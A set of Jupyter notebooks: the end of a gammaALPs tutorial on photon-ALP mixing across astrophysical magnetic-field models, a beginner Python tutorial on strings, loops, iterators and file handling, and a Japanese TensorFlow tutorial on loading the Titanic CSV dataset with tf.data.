gamma_max=np.exp(10.) * gamma_min, # maximum lorentz factor of emitting electrons,
# only used if equipartition=True
Rjet= 40., # maximum jet length in pc (default: 1000.)
n0=1e4, # normalization of electron density, overwritten if equipartition=True
beta=-2. # power-law index of electron density, overwritten if equipartition=True
)
ml_chi.add_propagation("Jet",
0, # position of module counted from the source.
B0=0.32, # Jet field at r = R0 in G
r0=1., # distance from BH where B = B0 in pc
rgam=3.19e17 * u.cm.to('pc'), # distance of gamma-ray emitting region to BH
alpha=-1., # exponent of toroidal mangetic field (default: -1.)
psi=np.pi/4., # Angle between one photon polarization state and B field.
# Assumed constant over entire jet.
helical=True, # if True, use helical magnetic-field model from Clausen-Brown et al. (2011).
# In this case, the psi kwarg is treated is as the phi angle
# of the photon trajectory in the cylindrical jet coordinate system
equipartition=True, # if true, assume equipartition between electrons and the B field.
# This will overwrite the exponent of electron density beta = 2 * alpha
# and set n0 given the minimum electron lorentz factor set with gamma_min
gamma_min=gamma_min, # minimum lorentz factor of emitting electrons, only used if equipartition=True
gamma_max=np.exp(10.) * gamma_min, # maximum lorentz factor of emitting electrons,
# only used if equipartition=True
Rjet= 40., # maximum jet length in pc (default: 1000.)
n0=1e4, # normalization of electron density, overwritten if equipartition=True
beta=-2., # power-law index of electron density, overwritten if equipartition=True
chi=chispl
)
```
Pick a mass and coupling where there is some mixing, and run the calculation for each.
```
ml.alp.m = 100.
ml.alp.g = 0.3
ml_chi.alp.m = 100.
ml_chi.alp.g = 0.3
px, py, pa = ml.run()
pgg = px + py
px_c, py_c, pa_c = ml_chi.run()
pgg_chi = px_c + py_c
for p in pgg:
plt.plot(ml.EGeV, p, label=r'$\chi_{CMB}$')
for p_c in pgg_chi:
plt.plot(ml_chi.EGeV, p_c, label=r'$\chi$-spline')
plt.grid(True, lw = 0.2)
plt.grid(True, which = 'minor', axis = 'y', lw = 0.2)
plt.xlabel('Energy (GeV)')
plt.ylabel(r'Photon survival probability')
plt.gca().set_xscale('log')
plt.annotate(r'$m_a = {0:.1f}\,\mathrm{{neV}}, g_{{a\gamma}}'
r' = {1:.2f} \times 10^{{-11}}\,\mathrm{{GeV}}^{{-1}}$'.format(ml.alp.m,ml.alp.g),
xy=(0.05,0.1),
size='large',
xycoords='axes fraction',
ha='left',
**effect)
plt.legend(loc='upper left')
```
The $P_{\gamma\gamma}$'s are quite different between the two cases. $\chi$ affects the mixing by lowering the high critical energy, $E_{crit}^{high}$, and so oftern reduces mixing at very high energies.
## Cluster
Now let's look at a cluster magnetic field, `"ICMGaussTurb"`. We can use the same $\chi$ array in $(E,r)$ but this time $r$ will be in kpc instead of pc.
```
# cluster
ml = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chi = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml.add_propagation("ICMGaussTurb",
0, # position of module counted from the source.
nsim=1, # number of random B-field realizations
B0=10., # rms of B field
n0=39., # normalization of electron density
n2=4.05, # second normalization of electron density, see Churazov et al. 2003, Eq. 4
r_abell=500., # extension of the cluster
r_core=80., # electron density parameter, see Churazov et al. 2003, Eq. 4
r_core2=280., # electron density parameter, see Churazov et al. 2003, Eq. 4
beta=1.2, # electron density parameter, see Churazov et al. 2003, Eq. 4
beta2=0.58, # electron density parameter, see Churazov et al. 2003, Eq. 4
eta=0.5, # scaling of B-field with electron denstiy
kL=0.18, # maximum turbulence scale in kpc^-1, taken from A2199 cool-core cluster, see Vacca et al. 2012
kH=9., # minimum turbulence scale, taken from A2199 cool-core cluster, see Vacca et al. 2012
q=-2.80, # turbulence spectral index, taken from A2199 cool-core cluster, see Vacca et al. 2012
seed=0 # random seed for reproducability, set to None for random seed.
)
ml_chi.add_propagation("ICMGaussTurb",
0, # position of module counted from the source.
nsim=1, # number of random B-field realizations
B0=10., # rms of B field
n0=39., # normalization of electron density
n2=4.05, # second normalization of electron density, see Churazov et al. 2003, Eq. 4
r_abell=500., # extension of the cluster
r_core=80., # electron density parameter, see Churazov et al. 2003, Eq. 4
r_core2=280., # electron density parameter, see Churazov et al. 2003, Eq. 4
beta=1.2, # electron density parameter, see Churazov et al. 2003, Eq. 4
beta2=0.58, # electron density parameter, see Churazov et al. 2003, Eq. 4
eta=0.5, # scaling of B-field with electron denstiy
kL=0.18, # maximum turbulence scale in kpc^-1, taken from A2199 cool-core cluster, see Vacca et al. 2012
kH=9., # minimum turbulence scale, taken from A2199 cool-core cluster, see Vacca et al. 2012
q=-2.80, # turbulence spectral index, taken from A2199 cool-core cluster, see Vacca et al. 2012
seed=0, # random seed for reproducability, set to None for random seed.
chi = chispl
)
ml.alp.m = 10.
ml.alp.g = 0.7
ml_chi.alp.m = 10.
ml_chi.alp.g = 0.7
px, py, pa = ml.run()
pgg = px + py
px_c, py_c, pa_c = ml_chi.run()
pgg_chi = px_c + py_c
for pi,p in enumerate(pgg):
if pi==0:
plt.plot(ml.EGeV, p, color=plt.cm.tab10(0.), alpha = 0.7, label=r'$\chi_{CMB}$')
else:
plt.plot(ml.EGeV, p, color=plt.cm.tab10(0.),alpha = 0.1)
for pi_c,p_c in enumerate(pgg_chi):
if pi_c==0:
plt.plot(ml_chi.EGeV, p_c, color=plt.cm.tab10(1), alpha = 0.7, label=r'$\chi$-spline')
else:
plt.plot(ml_chi.EGeV, p_c, color=plt.cm.tab10(1),alpha = 0.1)
plt.grid(True, lw = 0.2)
plt.grid(True, which = 'minor', axis = 'y', lw = 0.2)
plt.xlabel('Energy (GeV)')
plt.ylabel(r'Photon survival probability')
plt.gca().set_xscale('log')
plt.annotate(r'$m_a = {0:.1f}\,\mathrm{{neV}}, g_{{a\gamma}}'
r' = {1:.2f} \times 10^{{-11}}\,\mathrm{{GeV}}^{{-1}}$'.format(ml.alp.m,ml.alp.g),
xy=(0.05,0.1),
size='large',
xycoords='axes fraction',
ha='left',
**effect)
plt.legend(loc='upper left')
```
Again, including $\chi$ lowers the highest energy at which there is strong mixing.
## GMF
For the GMF:
```
# GMF
ml = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chi = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml.add_propagation("GMF",
0,
model='jansson12')
ml_chi.add_propagation("GMF",
0,
model='jansson12',
chi = chispl)
ml.alp.m = 1.
ml.alp.g = 3.
ml_chi.alp.m = 1.
ml_chi.alp.g = 3.
px, py, pa = ml.run()
pgg = px + py
px_c, py_c, pa_c = ml_chi.run()
pgg_chi = px_c + py_c
for p in pgg:
plt.plot(ml.EGeV, p, label=r'$\chi_{CMB}$')
for p_c in pgg_chi:
plt.plot(ml_chi.EGeV, p_c, label=r'$\chi$-spline')
plt.grid(True, lw = 0.2)
plt.grid(True, which = 'minor', axis = 'y', lw = 0.2)
plt.xlabel('Energy (GeV)')
plt.ylabel(r'Photon survival probability')
plt.gca().set_xscale('log')
plt.annotate(r'$m_a = {0:.1f}\,\mathrm{{neV}}, g_{{a\gamma}}'
r' = {1:.2f} \times 10^{{-11}}\,\mathrm{{GeV}}^{{-1}}$'.format(ml.alp.m,ml.alp.g),
xy=(0.05,0.1),
size='large',
xycoords='axes fraction',
ha='left',
**effect)
plt.legend(loc='upper left')
```
The effect is the same.
## IGMF
Mixing in the IGMF is slightly different. Far from pair-produciton energies, $\chi \propto \rho$ where $\rho$ is the energy density of the background field. The energy density of the CMB evolves with redshift as $\rho \propto T^4 \propto (1+z)^4$. Therefore, by default, mixing in the IGMF doesn't use a constant value of $\chi_{CMB}$, but rather uses $\chi(z)=\chi_{CMB}(1+z)^4$ where $\chi_{CMB} = 5.11\times10^{-43}$ as mentioned above and is calculated at $z=0$.
It is also possible to manually include a spline function for $\chi$ in the IGMF, but now the spline needs to be in energy and redshift instead of energy and distance:
```
zs = np.logspace(-1,np.log10(1.5),200)
chispl_z = RBSpline(EGeV,zs,chis,kx=1,ky=1,s=0)
# IGMF
ml = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chi = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chiz = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
```
For comparison we will also include a constant value of $\chi_{CMB}$. Any environment will accept a single value of chi in the form of `chi=np.array([chi])`.
```
ml.add_propagation("IGMF",
0, # position of module counted from the source.
nsim=1, # number of random B-field realizations
B0=1e-3, # B field strength in micro Gauss at z = 0
n0=1e-7, # normalization of electron density in cm^-3 at z = 0
L0=1e3, # coherence (cell) length in kpc at z = 0
eblmodel='dominguez', # EBL model
chi = np.array([chiCMB])
)
ml_chi.add_propagation("IGMF",
0, # position of module counted from the source.
nsim=1, # number of random B-field realizations
B0=1e-3, # B field strength in micro Gauss at z = 0
n0=1e-7, # normalization of electron density in cm^-3 at z = 0
L0=1e3, # coherence (cell) length in kpc at z = 0
eblmodel='dominguez', # EBL model
chi = chispl_z
)
ml_chiz.add_propagation("IGMF",
0, # position of module counted from the source.
nsim=1, # number of random B-field realizations
B0=1e-3, # B field strength in micro Gauss at z = 0
n0=1e-7, # normalization of electron density in cm^-3 at z = 0
L0=1e3, # coherence (cell) length in kpc at z = 0
eblmodel='dominguez' # EBL model
)
ml.alp.m = 0.1
ml.alp.g = 3.
ml_chi.alp.m = 0.1
ml_chi.alp.g = 3.
ml_chiz.alp.m = 0.1
ml_chiz.alp.g = 3.
px, py, pa = ml.run()
pgg = px + py
px_c, py_c, pa_c = ml_chi.run()
pgg_chi = px_c + py_c
px_cz, py_cz, pa_cz = ml_chiz.run()
pgg_chiz = px_cz + py_cz
for p in pgg:
plt.plot(ml.EGeV, p, label=r'$\chi_{CMB}$')
for p_cz in pgg_chiz:
plt.plot(ml_chiz.EGeV, p_cz, label=r'$\chi_{CMB} (1+z)^4$')
for p_c in pgg_chi:
plt.plot(ml_chi.EGeV, p_c, label=r'$\chi$-spline')
plt.grid(True, lw = 0.2)
plt.grid(True, which = 'minor', axis = 'y', lw = 0.2)
plt.xlabel('Energy (GeV)')
plt.ylabel(r'Photon survival probability')
plt.gca().set_xscale('log')
plt.annotate(r'$m_a = {0:.1f}\,\mathrm{{neV}}, g_{{a\gamma}}'
r' = {1:.2f} \times 10^{{-11}}\,\mathrm{{GeV}}^{{-1}}$'.format(ml.alp.m,ml.alp.g),
xy=(0.05,0.1),
size='large',
xycoords='axes fraction',
ha='left',
**effect)
plt.legend()
```
All three are different.
| github_jupyter |
## Multiline string
```
print("""
This is a multi line string
this is good
""")
print("This is a multi line string \n This is too good")
```
### Sub Strings
```
s = "Namaste World"
# test substring membership
print("Namaste" in s)
print(" World" in s)
print("e W" in s)
print("Nasdasda" in s)
```
## Built-in String methods
### String Manipulation to change casing
```
s = "Hello World"
s.lower()
s.capitalize()
s_capitalize = s.capitalize()
s_capitalize.title()
```
### Replacement and Trim
```
# Strip
s = " Hello World "
s.rstrip()
s = "Hello World_._._.."
s.rstrip('_.')
s.rstrip('.')
s = "Hello World_._._.. "
s.strip('.''_'' ')
```
### String splitting
```
word = "H.e.l.l o"
word.split(' ')
```
#### All the numbers and special characters in any sentence or sequence of characters when split will always be string
```
s = "The quick ^%$^%^$% brown 222 fox jumped over the lazy dog"
s.split(' ')
```
## `print()` formatting
You can read this [Real Python's blog on print formatting](https://realpython.com/python-f-strings/)
```
name = "Newton"
age = 22
married = False
print("My name is:", name, " and my age is ", age)
print("My name is %s, my age is %s, and it is %s that I am married" % (name, age, married))
print("My name is {}, my age is {}, and it is {} that I am married".format(name, age, married))
print("My name is {n}, my age is {a}, and it is {m} that I am married".format(n=name, a=age, m=married))
# f-strings (Only for Python3.6)
print(f"My name is {name} and age is {age}")
```
## Using `input()` function
```
number1 = input('Enter first number:')
number2 = input('Enter second number:')
```
#### When you get the values from users via `input()`, all those values are of the type `str`.
#### All you need to do is a little type casting, if the values are `float` or `int` and you'd want to use them as numbers
```
print(type(number1))
print(type(number2))
```
#### How to convert `str` to `int`?
```
print(int(number1))
print(type(int(number1)))
```
#### Finally adding those two numbers that we got above
```
addition_ = float(number1) + float(number2)
print(addition_)
```
#### One can also directly print operations (e.g. addition here) on the fly
```
print("Addition:", (float(number1) + float(number2)))
```
#### Using `f-strings`
```
print(f"Addition: {float(number1) + float(number2)}")
```
## Basic Arithmetic
```
# Subtraction
int_ = 2 - 1
int_
print(float(sub))
print(float(2 - 1))
```
#### How do you write $2x10^{-2}$ in Python
```
2e-2
```
#### For $2x10^{3}$ (This weird syntax and rendering is called `Latex` btw)
#### How to write in Latex: [Click here](https://www.math.ubc.ca/~pwalls/math-python/jupyter/latex/)
```
2e3
# Multiplication
22132 * 2e2
# Division
0.1/5
```
### Formatting numbers with decimals
#### More formatting in details: [click here](https://pyformat.info/)
```
format(4.333333, '.3f')
round(4.333, 1)
print("Float value is {:.2f}".format(4.33333))
```
## Unpacking
```
a = 5
b = 3.14
c = "Movies"
a, b, c, *_ = 5, 3.14, "Movies", "Stray", "This", "Value"
print(a)
print(b)
print(c)
print(_)
```
### Little Detour on why use `_` (underscore) or `__` (double underscore aka dunder)
### When used in interpreter
The python interpreter stores the last expression value to the special variable called ‘_’.
### `single_trailing_underscore_`
This convention could be used for avoiding conflict with Python keywords or built-ins. You might not use it often.
```
len_
```
### `_single_leading_underscore`
This convention is used for declaring private variables, functions, methods and classes in a module. Anything with this convention are ignored in from module import *.
```
_len
```
### `__double_leading_and_trailing_underscore__`
This convention is used for special variables or methods (so-called “magic method”) such as __init__, __len__. These methods provides special syntactic features or does special things
```
s = "this"
s.__len__()
len(s)
```
### In python, every thing is an `Object`. A variable is an object, a list is an object, a function is an object and a class is an object. So hereon, when we refer to anything as an `Object` it will have methods that can be accessed to do some operations on it.
### In order to find what methods are available for an object, use the method `dir`
```
dir(s)
```
#### As previously seen, for any string the methods (`split`, `strip`, `capitalize` or other) are available!
### Accessing a value in dictionary
```
# Make a dictionary with {} and : to signify a key and a value
my_dict = {'key1':'value1','key2':'value2'}
# Call values by their key
print(my_dict['key2'])
print(my_dict.get('key2'))
```
### Method Chaining
```
my_dict = {0:123,
1:[12,23,33],
2:['item0','item1','item2']}
my_dict.get(2)[1].upper().title().lower().capitalize()
```
## Programming Constructs
### if, elif and else
```
a = "This"
b = 4
if a == b: # Condition
print("a is equal to b")
elif a > b:
print("a is greater than b")
elif a < b:
print("a is less than b")
else:
print("Wht?")
```
### Going more complex
```
a = 6
b = 5
if (isinstance(a, int) and isinstance(b, int)):
if a > b:
print("a is greater than b")
elif a == b:
print("a is equal to b")
else:
print("a is less than b")
else:
print("There's a string here")
```
### for loops
### To calculate the range, we are calculating the range to get the indexes that will be needed to access the values in a list
```
my_list = [1, 2, 3, 4, 5, 6, 7, 8]
range(len(my_list))
len(my_list)
range(len(my_list))
```
### Printing the indices
```
for i in range(len(my_list)):
print(i)
```
### Printing the values in a list using the indices
```
for i in range(len(my_list)):
print(my_list[i])
```
### Now that we have values being accessed, we can perform the tasks that we want to do
```
for i in range(len(my_list)):
print(my_list[i] * 2)
```
### There's a more pythonic way to use loops. Instead of the method above, we can directly iterate through the values without using the indices
```
for i in my_list:
print(i ** 0.5)
```
### There's another way to get the indices and values directly using `ennumerate()`
```
for key, value in enumerate(my_list):
print(key, ":",value)
```
### We could do more things, we can find values that are greater than 5 in a list using `if-elif-else`
```
my_list = [1, 2, 3, 4, 5, 6, 7, 8]
for num in my_list:
if num > 5:
print("Num is greater than 5")
elif num == 5:
print("Num is equal to 5")
else:
print("Num is less than 5")
```
### List comprehensions
#### For loops in a single line!
```
hello = []
names = ["Ravi", "Pooja", "Vijay", "Kiran"]
```
#### Using regular for loops, adding "Hello, {name}"
```
for i in names:
temp = "Hello," + i
print(temp)
hello.append(temp)
```
### We can do it efficiently eliminating a lot of lines from above code (syntatic sugar)
```
["Hello," + value for value in names]
```
### List comprehensions are also faster than regular for loops
#### To find out the speed there are two Magic commands available for us: `%time` and `%timeit`
#### `%time` runs just once as: `%time "Whatever code you want to run"`
#### `%timeit` can be run `n` times as: `%timeit -n 1000 "Whatever code you want to run"`
```
%timeit -n 100 [value * 2 for value in value_range]
```
#### Note: If you benchmark the above list comprehension code and regular for loop code for the same operations, the for loop might be faster. But for longer running operations list comprehensions win out (generally)
### Iterators
#### Iterators are faster way to iterate through a list and achieve more by consuming less memory. Iterators are great when doing analysis on CSVs where we want to manually operate on the data at hand (without using libraries, which generally isn't the case and won't be good to do).
#### Data Engineering tasks which use lists as data structures can be sped up with iterators (which we'll be looking at in the next session) can be a good use case for `iterators` and `generators`
### To convert a list to an iterator, use the method: `iter()`
```
my_list = range(100, 999)
iterator = iter(my_list)
```
### To access a value in an iterator, use `next()`
```
next(iterator)
```
### If you keep running `next(iterator)`, it will continue running until the references to it exhausts.
```python
next(iterator)
---------------------------------------------------------------------------
StopIteration Traceback (most recent call last)
<ipython-input-384-3733e97f93d6> in <module>()
----> 1 next(iterator)
StopIteration:
```
### You'll encounter the error above when the iterator exhausts (which in simple terms means that there's no value to be iterated through)
## For us shaving off time for all our operations is essential
```
%timeit -n 10000 [num ** 0.3 for num in my_list]
%timeit -n 10000 [iter_ ** 0.3 for iter_ in iterator]
```
### As mentioned, iterators are much faster than lists
### When an `iterator` exhausts it throws `StopIteration` error, would you be able to catch it?
```
my_list = range(100, 999)
iterator = iter(my_list)
%timeit -n 100 [iter_ ** 0.3 for iter_ in iterator]
try:
next(iterator)
except StopIteration:
print("The iterator has exhausted")
finally:
iterator = iter(my_list)
print("The iterator has been reconfigured")
next(iterator)
```
## `with` keyword
### `with` keyword is called context manager, this is all to avoid manual `try and catch` while opening and closing a file
#### NOTE: `!ls` will only work for Unix systems, not for Windows. For windows: `!dir` might work
```
!ls
```
### Download some data quickly
```
!wget https://raw.githubusercontent.com/hadley/r4ds/master/data/heights.csv
!ls
```
### Reading the csv file and printing the methods available for the `file` object:
```
with open('heights.csv', 'r') as file:
print(dir(file))
```
### It so happens that the function: `readline()` and `readlines()` help you to access the data in `heights.csv`
```
with open('heights.csv', 'r') as file:
print(file.readline())
```
`readline()` will print out just a single line, to print our all the data you need to use `readlines()`
```
with open('heights.csv', 'r') as file:
print(file.readlines()[:5])
```
### Note: Since `file.readlines()` is a list, will be curtailing that to print only first five rows
## A few useful libraries
### `glob` library: To get paths of all the common file extensions in a folder (e.g `.csv`, `.png`, `.txt`, `.jpeg`)
#### First we'll download a few files
```
!wget https://raw.githubusercontent.com/tidyverse/ggplot2/master/data-raw/economics.csv
!wget https://raw.githubusercontent.com/tidyverse/ggplot2/master/data-raw/midwest.csv
!wget https://raw.githubusercontent.com/tidyverse/ggplot2/master/data-raw/mpg.csv
!ls
import glob # Use `import <library-name>` to import any useful library
glob.glob('./*.csv')
```
#### What the above function `glob.glob('./*.csv')` does is to get all the csv files present in that folder.
#### As we'll find out in the next sessions, this is particularly good when you want to append multiple CSV files (maybe from different months or years or different sources) in a single script. Getting the paths and iterating through that easily can be done using `glob`
### `json` library: Many data sources that an ML engineer might need could be in `*.json` format
#### Downloading a `.json` data file
```
!wget https://api.github.com/emojis
!ls
import json
with open('emojis', 'rb') as file:
print(file.read())
```
#### `file.read()` will give you a raw string format which isn't of great use to us!
```
with open('emojis', 'rb') as file:
print(json.loads(file.read()))
```
#### `json.loads(file.read())` will provide the `dict` format (dictionary data structure) that we can use to get things that we might want to get
```
with open('emojis') as file:
print(json.load(file))
```
#### `json.load(file)` has only a minor difference that it directly loads the file without having to explicitly read it as in `json.loads(file.read())`
| github_jupyter |
##### Copyright 2019 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# tf.data を使って CSV をロードする
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/beta/tutorials/load_data/csv"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/ja/beta/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/ja/beta/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
</td>
</table>
Note: これらのドキュメントは私たちTensorFlowコミュニティが翻訳したものです。コミュニティによる 翻訳は**ベストエフォート**であるため、この翻訳が正確であることや[英語の公式ドキュメント](https://www.tensorflow.org/?hl=en)の 最新の状態を反映したものであることを保証することはできません。 この翻訳の品質を向上させるためのご意見をお持ちの方は、GitHubリポジトリ[tensorflow/docs](https://github.com/tensorflow/docs)にプルリクエストをお送りください。 コミュニティによる翻訳やレビューに参加していただける方は、 [docs-ja@tensorflow.org メーリングリスト](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs-ja)にご連絡ください。
このチュートリアルでは、CSV データを `tf.data.Dataset` にロードする手法の例を示します。
このチュートリアルで使われているデータはタイタニック号の乗客リストから取られたものです。乗客が生き残る可能性を、年齢、性別、チケットの等級、そして乗客が一人で旅行しているか否かといった特性から予測することを試みます。
## 設定
```
try:
!pip install tf-nightly-2.0-preview
except Exception:
pass
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import tensorflow as tf
import tensorflow_datasets as tfds
TRAIN_DATA_URL = "https://storage.googleapis.com/tf-datasets/titanic/train.csv"
TEST_DATA_URL = "https://storage.googleapis.com/tf-datasets/titanic/eval.csv"
train_file_path = tf.keras.utils.get_file("train.csv", TRAIN_DATA_URL)
test_file_path = tf.keras.utils.get_file("eval.csv", TEST_DATA_URL)
# numpy の値を読みやすくする
np.set_printoptions(precision=3, suppress=True)
```
## データのロード
それではいつものように、扱っている CSV ファイルの先頭を見てみましょう。
```
!head {train_file_path}
```
ご覧のように、CSV の列にはラベルが付いています。後ほど必要になるので、ファイルから読み出しておきましょう。
```
# 入力ファイル中の CSV 列
with open(train_file_path, 'r') as f:
names_row = f.readline()
CSV_COLUMNS = names_row.rstrip('\n').split(',')
print(CSV_COLUMNS)
```
データセットコンストラクタはこれらのラベルを自動的にピックアップします。
使用するファイルの1行目に列名がない場合、`make_csv_dataset` 関数の `column_names` 引数に文字列のリストとして渡します。
```python
CSV_COLUMNS = ['survived', 'sex', 'age', 'n_siblings_spouses', 'parch', 'fare', 'class', 'deck', 'embark_town', 'alone']
dataset = tf.data.experimental.make_csv_dataset(
...,
column_names=CSV_COLUMNS,
...)
```
この例では使用可能な列をすべて使うことになります。データセットから列を除く必要がある場合には、使用したい列だけを含むリストを作り、コンストラクタの(オプションである)`select_columns` 引数として渡します。
```python
drop_columns = ['fare', 'embark_town']
columns_to_use = [col for col in CSV_COLUMNS if col not in drop_columns]
dataset = tf.data.experimental.make_csv_dataset(
...,
select_columns = columns_to_use,
...)
```
各サンプルのラベルとなる列を特定し、それが何であるかを示す必要があります。
```
LABELS = [0, 1]
LABEL_COLUMN = 'survived'
FEATURE_COLUMNS = [column for column in CSV_COLUMNS if column != LABEL_COLUMN]
```
コンストラクタの引数の値が揃ったので、ファイルから CSV データを読み込みデータセットを作ることにしましょう。
(完全なドキュメントは、`tf.data.experimental.make_csv_dataset` を参照してください)
```
def get_dataset(file_path):
dataset = tf.data.experimental.make_csv_dataset(
file_path,
batch_size=12, # 見やすく表示するために意図して小さく設定しています
label_name=LABEL_COLUMN,
na_value="?",
num_epochs=1,
ignore_errors=True)
return dataset
raw_train_data = get_dataset(train_file_path)
raw_test_data = get_dataset(test_file_path)
```
データセットを構成する要素は、(複数のサンプル, 複数のラベル)の形のタプルとして表されるバッチです。サンプル中のデータは(行ベースのテンソルではなく)列ベースのテンソルとして構成され、それぞれはバッチサイズ(このケースでは12個)の要素が含まれます。
実際に見てみましょう。
```
examples, labels = next(iter(raw_train_data)) # 最初のバッチのみ
print("EXAMPLES: \n", examples, "\n")
print("LABELS: \n", labels)
```
## データの前処理
### カテゴリデータ
この CSV データ中のいくつかの列はカテゴリ列です。つまり、その中身は、限られた選択肢の中のひとつである必要があります。
この CSV では、これらの選択肢はテキストとして表現されています。このテキストは、モデルの訓練を行えるように、数字に変換する必要があります。これをやりやすくするため、カテゴリ列のリストとその選択肢のリストを作成する必要があります。
```
CATEGORIES = {
'sex': ['male', 'female'],
'class' : ['First', 'Second', 'Third'],
'deck' : ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J'],
'embark_town' : ['Cherbourg', 'Southhampton', 'Queenstown'],
'alone' : ['y', 'n']
}
```
カテゴリ値のテンソルを受け取り、それを値の名前のリストとマッチングして、さらにワンホット・エンコーディングを行う関数を書きます。
```
def process_categorical_data(data, categories):
"""カテゴリ値を表すワンホット・エンコーディングされたテンソルを返す"""
# 最初の ' ' を取り除く
data = tf.strings.regex_replace(data, '^ ', '')
# 最後の '.' を取り除く
data = tf.strings.regex_replace(data, r'\.$', '')
# ワンホット・エンコーディング
# data を1次元(リスト)から2次元(要素が1個のリストのリスト)にリシェープ
data = tf.reshape(data, [-1, 1])
# それぞれの要素について、カテゴリ数の長さの真偽値のリストで、
# 要素とカテゴリのラベルが一致したところが True となるものを作成
data = categories == data
# 真偽値を浮動小数点数にキャスト
data = tf.cast(data, tf.float32)
# エンコーディング全体を次の1行に収めることもできる:
# data = tf.cast(categories == tf.reshape(data, [-1, 1]), tf.float32)
return data
```
この処理を可視化するため、最初のバッチからカテゴリ列のテンソル1つを取り出し、処理を行い、前後の状態を示します。
```
class_tensor = examples['class']
class_tensor
class_categories = CATEGORIES['class']
class_categories
processed_class = process_categorical_data(class_tensor, class_categories)
processed_class
```
2つの入力の長さと、出力の形状の関係に注目してください。
```
print("Size of batch: ", len(class_tensor.numpy()))
print("Number of category labels: ", len(class_categories))
print("Shape of one-hot encoded tensor: ", processed_class.shape)
```
### 連続データ
連続データは値が0と1の間にになるように標準化する必要があります。これを行うために、それぞれの値を、1を列値の平均の2倍で割ったものを掛ける関数を書きます。
この関数は、データの2次元のテンソルへのリシェープも行います。
```
def process_continuous_data(data, mean):
# data の標準化
data = tf.cast(data, tf.float32) * 1/(2*mean)
return tf.reshape(data, [-1, 1])
```
この計算を行うためには、列値の平均が必要です。現実には、この値を計算する必要があるのは明らかですが、この例のために値を示します。
```
MEANS = {
'age' : 29.631308,
'n_siblings_spouses' : 0.545455,
'parch' : 0.379585,
'fare' : 34.385399
}
```
前と同様に、この関数が実際に何をしているかを見るため、連続値のテンソルを1つ取り、処理前と処理後を見てみます。
```
age_tensor = examples['age']
age_tensor
process_continuous_data(age_tensor, MEANS['age'])
```
### データの前処理
これらの前処理のタスクを1つの関数にまとめ、データセット内のバッチにマッピングできるようにします。
```
def preprocess(features, labels):
# カテゴリ特徴量の処理
for feature in CATEGORIES.keys():
features[feature] = process_categorical_data(features[feature],
CATEGORIES[feature])
# 連続特徴量の処理
for feature in MEANS.keys():
features[feature] = process_continuous_data(features[feature],
MEANS[feature])
# 特徴量を1つのテンソルに組み立てる
features = tf.concat([features[column] for column in FEATURE_COLUMNS], 1)
return features, labels
```
次に、 `tf.Dataset.map` 関数を使って適用し、過学習を防ぐためにデータセットをシャッフルします。
```
train_data = raw_train_data.map(preprocess).shuffle(500)
test_data = raw_test_data.map(preprocess)
```
サンプル1個がどうなっているか見てみましょう。
```
examples, labels = next(iter(train_data))
examples, labels
```
このサンプルは、(バッチサイズである)12個のアイテムをもつ2次元の配列からできています。アイテムそれぞれは、元の CSV ファイルの1行を表しています。ラベルは12個の値をもつ1次元のテンソルです。
## モデルの構築
この例では、[Keras Functional API](https://www.tensorflow.org/alpha/guide/keras/functional) を使用し、単純なモデルを構築するために `get_model` コンストラクタでラッピングしています。
```
def get_model(input_dim, hidden_units=[100]):
"""複数の層を持つ Keras モデルを作成
引数:
input_dim: (int) バッチ中のアイテムの形状
labels_dim: (int) ラベルの形状
hidden_units: [int] DNN の層のサイズ(入力層が先)
learning_rate: (float) オプティマイザの学習率
戻り値:
Keras モデル
"""
inputs = tf.keras.Input(shape=(input_dim,))
x = inputs
for units in hidden_units:
x = tf.keras.layers.Dense(units, activation='relu')(x)
outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)
model = tf.keras.Model(inputs, outputs)
return model
```
`get_model` コンストラクタは入力データの形状(バッチサイズを除く)を知っている必要があります。
```
input_shape, output_shape = train_data.output_shapes
input_dimension = input_shape.dims[1] # [0] はバッチサイズ
```
## 訓練、評価、そして予測
これでモデルをインスタンス化し、訓練することができます。
```
model = get_model(input_dimension)
model.compile(
loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.fit(train_data, epochs=20)
```
モデルの訓練が終わったら、`test_data` データセットでの正解率をチェックできます。
```
test_loss, test_accuracy = model.evaluate(test_data)
print('\n\nTest Loss {}, Test Accuracy {}'.format(test_loss, test_accuracy))
```
単一のバッチ、または、バッチからなるデータセットのラベルを推論する場合には、`tf.keras.Model.predict` を使います。
```
predictions = model.predict(test_data)
# 結果のいくつかを表示
for prediction, survived in zip(predictions[:10], list(test_data)[0][1][:10]):
print("Predicted survival: {:.2%}".format(prediction[0]),
" | Actual outcome: ",
("SURVIVED" if bool(survived) else "DIED"))
```
| github_jupyter |
```
import pandas as pd
from bs4 import BeautifulSoup as bs
import bs4
import requests
from pprint import pprint
import Memory_Collaborative_Filtering as mem
import sqlite3 as sql
